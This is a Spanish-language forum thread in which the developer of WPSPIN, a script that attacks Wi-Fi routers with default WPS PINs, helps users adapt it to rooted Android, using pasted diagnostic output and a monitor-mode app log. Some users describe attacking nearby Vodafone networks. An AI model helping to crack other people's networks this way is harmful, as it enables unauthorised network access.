Ahora El primer fallo viene al momento de usar el resultado de scan.
Fijate a bien ser situado en el directorio WPSPIN donde tienes el script, o sea antes lanzar-lo o abres el shell directamente en este directorio te mueves primero en el con cd
el arcivo parece estar creado....
si estas situado en el buen sitio, es extrano que al ser root no tengas permisos para leer y usar lo pero se podría perfectamente dar permisos al archivo una vez creado ( chmod 777 tmp/Interface.txt

Citar
Con lo que me quedo es con poder sacar pin manualmente, pero la idea es lo automático jajaj he estado mirando y no he encontrado una lista de interfaces dentro del android... pero si que he encontrado una dirección /sys/class/net que contiene separadas por carpetas cada una de las interfaces del móvil esta es la captura:
Estoy contigo  :), si hay mode monitor reaver y wash, no hay razones de que no se pueda. :)

Citar
/sys/class/net

Bien.....  introduciré una condición para verificar dirver y interfaz.... lo que vendría bien es que me des el resultado de este comando, o sin dar me lo que me digas si permite pillar el driver de la interfaz wlan0.

Código: [Seleccionar]
ls -l /sys/class/net/wlan0/device/driver | rev | cut -d "/" -f1 | rev
así podría introducir una condición al momento de levantar la interfaz que gaste este driver y quedar nos con wlanX en lugar de buscar un monX.
El script tiene pensado una condición para los chipset "unknown", que salen como desconocidos pero que a veces andan a mitad... pero sobre monX...
No había pensado en esta posibilidad y no solamente esta bien para portar a android sino que esta bien tener la porque se puede dar el caso en un linux de sobre mesa  :)

para monta lo necesitaria un copiado -pegado xacto del resultado de
"airmon-ng start wlan0"
podría funcionar incluso, nunca he probado pero puede ser que funcione ya que teóricamente en un prmer tiempo pilla la interfaz sin mirar si es wlan o mon, lo que lueguo es possible que vuelva a pedir una interfaz, o va seguir adelante y deberia andar con wlan0.
No me recuerdo si hizo o no algo para averiguar que la interfaz de ataque llebe el prefijo mon o no

Citar
búsqueda de la interface también habría que poner el sitio desde donde iniciar el wash no? osea que sería un script totalmente diferente... creo que lo mas viable es que me conforme con que puedo introducir la mac manualmente y que me de el pin para yo introducirlo por separado en el reaver no? xD

Estas de broma  ;D ?   
Quiero ver una captura de pantalla WPSPIN rulando en tu teléfono con el PIN por defecto  la contraseña obtenido en 5 segundos,   :D
Ya parece que con actualizar tu versión de bash se han arreglado los problemas chungos de sintaxis y ahora es afinar y adaptar a tu chipset/sistema operativo
ya tengo un par asi, para detectar los rt3070 y los chipste desconocidos, no es mucho trabajo incluir otra condiciones, ya lleva sitio pensado para ello

necesitaría el resultado de
Código: [Seleccionar]
bash --version
Código: [Seleccionar]
airmon-ng
excelente noticia pongui2 gracias por tratstear  :)
algo haremos  ;)
Código: [Seleccionar]
uname -a
Código: [Seleccionar]
iw dev
Código: [Seleccionar]
airmon-ng start wlan0
asi podre ver como adaptar los ordenes sobre interfaces y ataque cuando se trata de Android
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: pongui2 en Octubre 16, 2013, 17:02:32 pm
Bueno lo primero que me comentas es que como ejecuto el script  o donde.. lo tengo copiado en la sd y en el terminal me hago SU.. y hago cd sdcard/WPSPIN/  y ya desde hay en root ejecuto con bash WPSPIN.sh osea que en teoría estando ejecutado en root el script tendría que tener acceso a todo el móvil...
he puesto los comandos que me has dicho y el resultado es este:

Código: [Seleccionar]
ver | rev | cut -d "/" -f1 | rev                                                      <   (sale cortado pero el resultado es la linea de abajo)
bcmsdh_sdmmc

root@android:/ # airmon-ng
sh: airmon-ng: not found

127|root@android:/ # bash --version
GNU bash, version 4.2.45(2)-release (arm-android-linux-gnu)
(GNU bash Distro for Android ARM/MIPS/x86 - BitCubate Apps)
For support contact Robert Nediyakalaparambil (maxice@gmail.com) or visit bitcubate.com

Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

root@android:/ # uname -a
Linux localhost 3.0.31-Apolo_4.11_ExtrV0-TWRP #491 :) armv7l GNU/Linux

root@android:/ # iw dev
sh: iw: not found
127|root@android:/ #

Bueno el airmon-ng y el iw es el que no esta... el airmon-ng es porque el modo monitor no se activa con el propio aircrack si no con una aplicación con interfaz gráfica al activarlo se queda asi:
(http://img30..us/img30/622/ov6f.png)

Pero lo que he hecho es sacar el log de la aplicación y espero que hay venga lo que necesitas saber:
Código: [Seleccionar]
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE log SYSTEM "logger.dtd">
<log><record>
    <date>11/10/2013 11:15:33</date>
    <millis>1381482933450</millis>
    <sequence>0</sequence>
    <logger>com.bcmon.bcmon.Manager</logger>
    <level>INFO</level>
    <class>com.bcmon.bcmon.Manager</class>
    <method><init></method>
    <thread>0</thread>
    <message>Log started</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939182</millis>
    <sequence>1</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'echo a' finished with exitValue = 0</message>
    <param>a
</param>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939233</millis>
    <sequence>2</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>SEVERE</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'cp' failed with exitValue = 1</message>
    <param>BusyBox v1.20.2-jb static (2012-11-25 17:47 +0100) multi-call binary.

Usage: cp [OPTIONS] SOURCE... DEST

Copy SOURCE(s) to DEST

-a Same as -dpR
-R,-r Recurse
-d,-P Preserve symlinks (default if -R)
-L Follow all symlinks
-H Follow symlinks on command line
-p Preserve file attributes if possible
-f Overwrite
-i Prompt before overwrite
-l,-s Create (sym)links

</param>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939274</millis>
    <sequence>3</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4329</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>detect started</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939277</millis>
    <sequence>4</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4329</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>return false</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939293</millis>
    <sequence>5</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>detect started</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939304</millis>
    <sequence>6</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>checking path: /system/etc/wifi/bcmdhd_sta.bin</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939643</millis>
    <sequence>7</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>isPatched</method>
    <thread>0</thread>
    <message>isPatched('/system/etc/wifi/bcmdhd_sta.bin') = false</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939648</millis>
    <sequence>8</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINER</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>detected: detected_fw_path = '/system/etc/wifi/bcmdhd_sta.bin', is_patched = false</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939652</millis>
    <sequence>9</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'lsmod' finished with exitValue = 0</message>
    <param>dhd 292720 0 - Live 0xbf062000
frandom 3135 0 - Live 0xbf05e000
exfat_fs 16586 0 - Live 0xbf055000
exfat_core 75216 1 exfat_fs, Live 0xbf03e000
j4fs 53364 1 - Live 0xbf02d000 (P)
Si4709_driver 15421 0 - Live 0xbf025000
ffu 138150 0 - Live 0xbf000000
</param>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939654</millis>
    <sequence>10</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>isModuleLoaded</method>
    <thread>0</thread>
    <message>return = true</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939657</millis>
    <sequence>11</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINER</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>is_module = 'true'</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939659</millis>
    <sequence>12</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>checkModulePath</method>
    <thread>0</thread>
    <message>ko_path = '/lib/modules/dhd.ko'</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939684</millis>
    <sequence>13</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>INFO</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>detected: detected_fw_path = '/system/etc/wifi/bcmdhd_sta.bin', is_patched = false, is_module = true, device_name = 'wlan0', bcmon_fw_path = '/data/data/com.bcmon.bcmon/files/bcm4330_sta.bcmon.bin', should_backup = false</message>
</record>
<record>
    <date>11/10/2013 11:15:39</date>
    <millis>1381482939700</millis>
    <sequence>14</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>SEVERE</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'cp' failed with exitValue = 1</message>
    <param>BusyBox v1.20.2-jb static (2012-11-25 17:47 +0100) multi-call binary.

Usage: cp [OPTIONS] SOURCE... DEST

Copy SOURCE(s) to DEST

-a Same as -dpR
-R,-r Recurse
-d,-P Preserve symlinks (default if -R)
-L Follow all symlinks
-H Follow symlinks on command line
-p Preserve file attributes if possible
-f Overwrite
-i Prompt before overwrite
-l,-s Create (sym)links

</param>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954645</millis>
    <sequence>15</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'echo a' finished with exitValue = 0</message>
    <param>a
</param>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954659</millis>
    <sequence>16</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>SEVERE</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'cp' failed with exitValue = 1</message>
    <param>BusyBox v1.20.2-jb static (2012-11-25 17:47 +0100) multi-call binary.

Usage: cp [OPTIONS] SOURCE... DEST

Copy SOURCE(s) to DEST

-a Same as -dpR
-R,-r Recurse
-d,-P Preserve symlinks (default if -R)
-L Follow all symlinks
-H Follow symlinks on command line
-p Preserve file attributes if possible
-f Overwrite
-i Prompt before overwrite
-l,-s Create (sym)links

</param>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954678</millis>
    <sequence>17</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4329</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>detect started</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954680</millis>
    <sequence>18</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4329</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>return false</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954685</millis>
    <sequence>19</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detect</method>
    <thread>0</thread>
    <message>detect started</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954690</millis>
    <sequence>20</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>checking path: /system/etc/wifi/bcmdhd_sta.bin</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954792</millis>
    <sequence>21</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>isPatched</method>
    <thread>0</thread>
    <message>isPatched('/system/etc/wifi/bcmdhd_sta.bin') = false</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954795</millis>
    <sequence>22</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINER</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>detected: detected_fw_path = '/system/etc/wifi/bcmdhd_sta.bin', is_patched = false</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954797</millis>
    <sequence>23</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'lsmod' finished with exitValue = 0</message>
    <param>dhd 292720 0 - Live 0xbf062000
frandom 3135 0 - Live 0xbf05e000
exfat_fs 16586 0 - Live 0xbf055000
exfat_core 75216 1 exfat_fs, Live 0xbf03e000
j4fs 53364 1 - Live 0xbf02d000 (P)
Si4709_driver 15421 0 - Live 0xbf025000
ffu 138150 0 - Live 0xbf000000
</param>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954799</millis>
    <sequence>24</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>isModuleLoaded</method>
    <thread>0</thread>
    <message>return = true</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954800</millis>
    <sequence>25</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINER</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>is_module = 'true'</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954802</millis>
    <sequence>26</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>checkModulePath</method>
    <thread>0</thread>
    <message>ko_path = '/lib/modules/dhd.ko'</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954816</millis>
    <sequence>27</sequence>
    <logger>com.bcmon.bcmon.chipsets.BCM4330B1</logger>
    <level>INFO</level>
    <class>com.bcmon.bcmon.chipsets.Chipset</class>
    <method>detectSingleFile</method>
    <thread>0</thread>
    <message>detected: detected_fw_path = '/system/etc/wifi/bcmdhd_sta.bin', is_patched = false, is_module = true, device_name = 'wlan0', bcmon_fw_path = '/data/data/com.bcmon.bcmon/files/bcm4330_sta.bcmon.bin', should_backup = false</message>
</record>
<record>
    <date>11/10/2013 11:15:54</date>
    <millis>1381482954843</millis>
    <sequence>28</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>SEVERE</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'cp' failed with exitValue = 1</message>
    <param>BusyBox v1.20.2-jb static (2012-11-25 17:47 +0100) multi-call binary.

Usage: cp [OPTIONS] SOURCE... DEST

Copy SOURCE(s) to DEST

-a Same as -dpR
-R,-r Recurse
-d,-P Preserve symlinks (default if -R)
-L Follow all symlinks
-H Follow symlinks on command line
-p Preserve file attributes if possible
-f Overwrite
-i Prompt before overwrite
-l,-s Create (sym)links

</param>
</record>
<record>
    <date>11/10/2013 11:15:57</date>
    <millis>1381482957142</millis>
    <sequence>29</sequence>
    <logger>com.bcmon.bcmon.Manager</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.Manager</class>
    <method>installToolsForce</method>
    <thread>0</thread>
    <message>Installing tools</message>
</record>
<record>
    <date>11/10/2013 11:15:57</date>
    <millis>1381482957536</millis>
    <sequence>30</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'chmod -R 755 "/data/data/com.bcmon.bcmon/files/tools"' finished with exitValue = 0</message>
    <param></param>
</record>
<record>
    <date>11/10/2013 11:15:57</date>
    <millis>1381482957812</millis>
    <sequence>31</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'chmod -R 755 "/data/data/com.bcmon.bcmon/files/jtr"' finished with exitValue = 0</message>
    <param></param>
</record>
<record>
    <date>11/10/2013 11:15:58</date>
    <millis>1381482958113</millis>
    <sequence>32</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'chmod -R 755 "/data/data/com.bcmon.bcmon/files/libs"' finished with exitValue = 0</message>
    <param></param>
</record>
<record>
    <date>11/10/2013 11:15:58</date>
    <millis>1381482958115</millis>
    <sequence>33</sequence>
    <logger>com.bcmon.bcmon.Manager</logger>
    <level>FINE</level>
    <class>com.bcmon.bcmon.Manager</class>
    <method>installToolsForce</method>
    <thread>0</thread>
    <message>Creating links</message>
</record>
<record>
    <date>11/10/2013 11:15:58</date>
    <millis>1381482958125</millis>
    <sequence>34</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'mount | grep system' finished with exitValue = 0</message>
    <param>/dev/block/mmcblk0p9 on /system type ext4 (ro,relatime,commit=15,barrier=1,data=ordered)
</param>
</record>
<record>
    <date>11/10/2013 11:15:58</date>
    <millis>1381482958152</millis>
    <sequence>35</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'mount -o rw,remount /system' finished with exitValue = 0</message>
    <param></param>
</record>
<record>
    <date>11/10/2013 11:15:58</date>
    <millis>1381482958190</millis>
    <sequence>36</sequence>
    <logger>com.bcmon.bcmon.RootExecuter</logger>
    <level>FINEST</level>
    <class>com.bcmon.bcmon.RootExecuter</class>
    <method>executeAsRoot</method>
    <thread>0</thread>
    <message>command: 'ln -s /data/data/com.bcmon.bcmon/files/tools/iwmulticall /system/xbin/iwconfig' finished with exitValue = 0</message>
    <param></param>
</record>

Te he tenido que poner solo un trozito porque es muy largo y no me cabe en el post...respecto a lo del "iw" no se porque no va... espero que no te de esto mucho trabajo.. eso si... espero que puedas tener tu captura del script funcionando a tope desde mi móvil jajaj porque está claro que la usaré...(soy adicto a los wifis) xD y cuenta conmigo para probar todo tipo de cosas y todo lo que yo pruebe aunque meta la pata también lo diré jajaj para saber los resultados... Muchas gracias y un saludo!
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Octubre 16, 2013, 18:06:45 pm
Tengo que documentarme sobre estas utlidades que tienes, a ver si no se dejan invocar con argumentos en modo silecnioso
seria lo mas simple.
seria mas facil si funcionaria directamente invocando airmon-ng, esta claro.

Código: [Seleccionar]
Bueno el airmon-ng y el iw es el que no esta... el airmon-ng es porque el modo monitor no se activa con el propio aircrack si no con una aplicación con interfaz gráfica al activarlo se queda asi:
lo que hace la interfaz grafica es automatizar ordenes, nada que no se pueda hacer si el código es libre y si se entiende
la parte con iw no es necesaria porque tu móvil solo lleva un chipset wireless,

O sea se reduce a tres casos :
- Chipset no compatible, otro que el BCM y esto se puede filtrar gracias al comando ls que pusiste  ;)
- Chipset con mode monitor sin activar
- Chipset con mode monitor activado

Y asi se cumple con todas las posibilidades.

Es factible, a lo guaro imagino que se puede llamar los ejecutables  ???
Así el usuario pone el mode monitor, cierra la ventana, y el script tira por adelante.
Voy a pensarlo y documentarme sobre mode monitor con BCM en android

muchas gracias a ti por toda esta información valiosa 
 saludos   :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: wayout en Octubre 31, 2013, 18:48:20 pm
¿Se sabe algo de unas nuevas (por lo menos para mi) vodafonexxxx con mac 88:03:55? Se que estas mac las usan las orange pero ya he visto varias en vodafone. Tienen wps activado
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Noviembre 18, 2013, 16:17:49 pm
No se instala se ejecuta desde su carpeta...
Necesitas un shell bash, si pongui2 se pasa por aquí te dirá mas cosas, lee sus mensajes y sus explicaciones. 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Noviembre 26, 2013, 10:23:31 am
Holas,

una preguntilla rápida.

Cuando hay varios pines posibles, hay alguna forma de decidir cual se usa por parte del usuario?
Sería factible permitir al usuario introducir un pin?

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Noviembre 26, 2013, 14:31:14 pm
Creo que si  :P  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Noviembre 26, 2013, 15:55:43 pm
Gracias ::D

Limpia tu bandeja, que te va un mensaje recién salido del horno :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: JC Mal Carnal en Enero 04, 2014, 03:25:19 am
Hey!!
Ustedes se emocionan muy rápido, ya hay una nueva manera de crackear WPA/WPA2 sin diccionarios inclusive sin reaver y su  fortuito WPS. Investiguen bien amigos y si no ya luego yo publicare el método.
Hasta entonces.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: chicho_22 en Enero 04, 2014, 09:19:10 am
Hey!!
Ustedes se emocionan muy rápido, ya hay una nueva manera de crackear WPA/WPA2 sin diccionarios inclusive sin reaver y su  fortuito WPS. Investiguen bien amigos y si no ya luego yo publicare el método.
Hasta entonces.

hola compi nos gustaría saber cual es ese método por favor cuando puedas explicarlo
? gracias un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 04, 2014, 10:14:27 am
Cita de: JC Mal Carnal
Hey!!
Ustedes se emocionan muy rápido
Quien se "emociona" eres tu..  por favor NO desvies el hilo del motivo para el cual fue creado, si quieres compartir un método "nuevo" o lo que sea abres un tema para ello y lo haces pero dejas este para lo que es.

¿de acuerdo? pues eso..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gladiator1976 en Enero 04, 2014, 13:35:48 pm
Hey!!
Ustedes se emocionan muy rápido, ya hay una nueva manera de crackear WPA/WPA2 sin diccionarios inclusive sin reaver y su  fortuito WPS. Investiguen bien amigos y si no ya luego yo publicare el método.
Hasta entonces.

Hola
Para decir eso, es mejor no decir nada¡¡¡ :o

pienso que es un gran farol hasta que demuestres lo contrario, :)

Perdon maripuri por desviar el tema.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Enero 04, 2014, 17:13:21 pm
Buenas;

Hey!!
Ustedes se emocionan muy rápido, ya hay una nueva manera de crackear WPA/WPA2 sin diccionarios inclusive sin reaver y su  fortuito WPS. Investiguen bien amigos y si no ya luego yo publicare el método.
Hasta entonces.
    Fecha registro= Hoy 

Mensajes= 1

Conclusión= Fantasma

Si me demuestras lo que dices, con mucho gusto modificaré el post.

   P.D. Perdón maripuri por el offtopic, pero con tipos como este...
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: chicho_22 en Enero 04, 2014, 17:17:22 pm
Mensajes= 1

Conclusión= Fantasma

Si me demuestras lo que dices, con mucho gusto modificaré el post.

   
tienes razon mas fantasma que casper ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: dakarpesca en Enero 04, 2014, 20:52:02 pm
creo que no es mas que un lamer como su propio perfil
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 04, 2014, 21:50:17 pm

Dejád estar el tema para lo que es por favor..

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: isi_isi en Enero 06, 2014, 15:23:10 pm
Hola a todos, llevo tiempo siguiéndoos desde las sombras ;) y me gustaría comentaros un problema que tengo con una red VodafoneXXXX, con bssid 5C:4C:A9.

Utilizando el WPSPIN la he atacado con el pin por defecto que me genera pero no recibo respuesta:

(http://img842..us/img842/4021/8u0f.png)

(http://img829..us/img829/2572/he6b.png)

Tengo que pararlo porque sino se bloquea el router, como ya me pasó.

De potencia tengo un PWR de 61% y claro, tiene WPS activado. Ya no se que más probar. ¿Alguno de vosotros sabéis algo acerca de estas redes?

Edito para decir que no sólo la he atacado con este script, también he probado con reaver y se queda probando el Pin genérico 12345670 indefinidamente.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: MEGAHOM en Enero 06, 2014, 15:36:16 pm
Haber si os enteráis de una vez no todas las red están accesibles aunque tengas el pin lo mismo te da un pin por defecto pero no sirve ay mas factores que te pueden bloquear
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: oscarelguapo2 en Enero 11, 2014, 16:23:31 pm
hola quiero aportar algo q he logrado investigar sobre los router Dir 600 Dlink regularmete uso wash y me manda los probe request me sale como el modelo Dir-600 ,fabricante  Dlink, y numero de serie lo que mas me sorprendio que cuando el usuario genere un nuevo pin es 100% compatible wpspin hasta los probe request cambian como  modelo ,fabricante ralink 2870 y tambien cambio el numero de serie abra una explicacion sobre esto
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 11, 2014, 17:54:31 pm
Si vas a hablar de linux postea en el tema WPSPIN linux.. o en donde mejor vaya de linux ¿que sentido tiene habalar de esto en el tema de Windows?



12-01-14

editado.  Ahora que lo has comprendido lo muevo, en adelante ya sabes lo que tienes que hacer.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: oscarelguapo2 en Enero 12, 2014, 07:11:28 am
entendido mi jefa
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 12, 2014, 21:02:23 pm
No entendí todo, haría falta mandar los datos completos y que explicas mejor lo que te perturba   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: madmartigan en Enero 23, 2014, 15:55:13 pm
tengo un problema,

al hacer el escaneo en wash me salen muchas redes, pero al cerrarlo luego no me aparece ninguna red y se queda ahí esperando a que selecione una red pero no puedo selecionar ninguna pq no hay.

gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 23, 2014, 18:02:18 pm
Que distribución usas? ( creo que me se la respuesta  :P )
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: madmartigan en Enero 23, 2014, 18:20:38 pm
estoy ejecutando la aplicacion en wifislax, via maquina virtual en un Mac...

jajaja

algo que ver?

Gracias kcdtv
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 23, 2014, 18:26:50 pm
Citar
ue distribución usas? ( creo que me se la respuesta  :P )
¿como era..? +1  ¿mas una?   :P


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Enero 23, 2014, 18:27:53 pm
algo que ver?

Muchisisisisismo.....


Pruebala en kali y veras como funciona bien WPSPIN ;)

No depende de nosotros el que a veces no se implementen correctamente las cosas en las live que usais....sea la que sea ;)
